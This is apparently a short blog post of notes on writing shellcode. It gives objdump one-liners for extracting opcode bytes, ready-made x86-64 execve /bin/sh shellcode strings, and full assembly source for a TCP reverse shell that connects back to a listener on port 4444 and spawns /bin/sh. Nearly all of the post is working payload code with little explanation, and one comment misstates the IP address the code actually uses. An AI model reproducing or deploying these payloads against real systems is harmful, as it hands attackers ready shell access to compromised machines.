Get shellcode of the binary using objdump
objdump -d ./Exit.o|grep '[0-9a-f]:'|grep -v 'file'|cut -f2 -d:|cut -f1-6 -d' '|tr -s ' '|tr '\t' ' '|sed 's/ $//g'|sed 's/ /\\x/g'|paste -d '' -s |sed 's/^/"/'|sed 's/$/"/g'
Output: "\x48\x31\xc0\xb0\x3c\x48\x31\xff\x0f\x05"
for i in $(objdump -d Exit.o -M intel |grep "^ " |cut -f2); do echo -n '\x'$i; done;echo
Execve
"\x48\x31\xc0\x50\x48\xbb\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x53\x48\x89\xe7\x50\x48\x89\xe2\x57\x48\x89\xe6\x48\x83\xc0\x3b\x0f\x05";
/bin/sh
"\x31\xc0\x48\xbb\xd1\x9d\x96\x91\xd0\x8c\x97\xff\x48\xf7\xdb\x53\x54\x5f\x99\x52\x57\x54\x5e\xb0\x3b\x0f\x05"
X86/64-bit TCP Reverse Shell
#Compile and get Shellcode
nasm -f elf64 stack.nasm -o stack.o
objdump -M intel -D stack.o
ld stack.o -o stack
for i in $(objdump -D ./rev |grep "^ " |cut -f2); do echo -n '\x'$i; done; echo
$Shell starts here
section .text
global _start
_start:
; clearing rax, rdi, rsi, rdx
xor rax, rax
xor rdi, rdi
xor rsi, rsi
xor rdx, rdx
;socket
add rax, 41 ;syscall number for socket
add rdi, 2
add rsi, 1
syscall
mov rdi, rax
; preparing structure for connect
; IP - 127.1.1.1 - 0x0101017F; 1 - 01, 127 -7F
push 0x0100007f
; Port 9999 - 270F - 0x0f27
; Port 4444 - 115c - 0x5c11
push word 0x5c11
push word 0x2
;connect
mov rsi, rsp
add rdx, 0x10
xor rax, rax
add rax, 42
syscall
xor rsi, rsi
add rsi, 2
loop:
xor rax, rax
add rax, 33
syscall
dec rsi
jns loop
;execve
xor rax, rax
mov rdx, rax ; NULL for argument 3
mov rsi, rdx ;NULL for argument 2
push rax
mov rbx, 0x68732f6e69622f2f
push rbx
mov rdi, rsp
add rax, 59
syscall
No comments:
Post a Comment